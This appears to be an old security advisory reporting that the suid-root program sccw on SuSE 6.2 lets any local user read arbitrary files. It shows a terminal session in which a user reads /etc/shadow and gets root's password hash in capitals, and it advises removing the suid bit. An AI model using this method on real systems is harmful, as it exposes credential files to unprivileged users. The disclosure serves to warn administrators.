Greetings, /usr/bin/sccw, suid root by default on SuSE 6.2, allows any user to read any file on the system. Sort of. Well, it's enough to read the text of almost anything. In capitals. Without punctuation. Check it out: xnec@susebox:/tmp > id uid=1001(xnec) gid=100(users) groups=100(users) xnec@susebox:/tmp > sccw ========================================================== Soundcard CW for Linux v1.1 Steven J. Merrifield, VK3ESM ========================================================== 1. Set the speed, currently = 10 2. Set the frequency, currently = 700 3. Set the volume, currently = 32 4. Set the delay value, currently = 3 5. Set the character set for random groups, currently = 1 6. Set the number of groups, currently = 5 7. Receive random character groups. 8. Receive a file. 9. QUIT ========================================================== Enter your choice : 8 Enter filename : /etc/shadow ROOTFGPZNZWZ5GWRG10850010000 BIN8902010000 DAEMON8902010000 ... etc. The printing of these lines takes a few seconds each, so be patient. While you're waiting, remove the suid-bit. Of course, getting the /etc/shadow file in all caps isn't instant root, but it's a start for someone out there. Besides, he can still read your mail in all caps, without punctuation. Brock Tellier UNIX Systems Administrator Webley Systems www.webley.com